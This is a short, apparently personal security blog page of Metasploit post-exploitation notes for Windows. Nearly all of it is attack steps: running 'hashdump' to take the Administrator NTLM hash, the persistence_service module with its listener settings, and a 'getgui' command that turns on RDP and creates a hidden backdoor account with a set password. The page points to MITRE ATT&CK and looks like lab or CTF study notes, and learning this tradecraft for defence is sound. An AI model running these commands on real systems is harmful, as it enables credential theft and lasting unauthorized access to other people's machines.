rootđź’€bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

You can run the “hashdump” command to get the Administrator NTLM hash. so with this you’ll be able to authenticate with it later on

You can check the mitre attack website also

Persistence via Services

use exploit/windows/local/persistence_service
set LPORT
set LHOST
set SESSION
exploit

Take note of the path the payload was written to, so you can delete afterwards

Persistence via RDP

A new account will be created, rdp will be enabled, making the username not visible on the login screen

To create a new account on the meterpreter shell

run getgui -e -u blackanon -p hacker_123321

“getgui” command is used to check if the rdp is enabled, if it is disabled, the command will enable it, further more it creates a new user. it hides the user from the login screen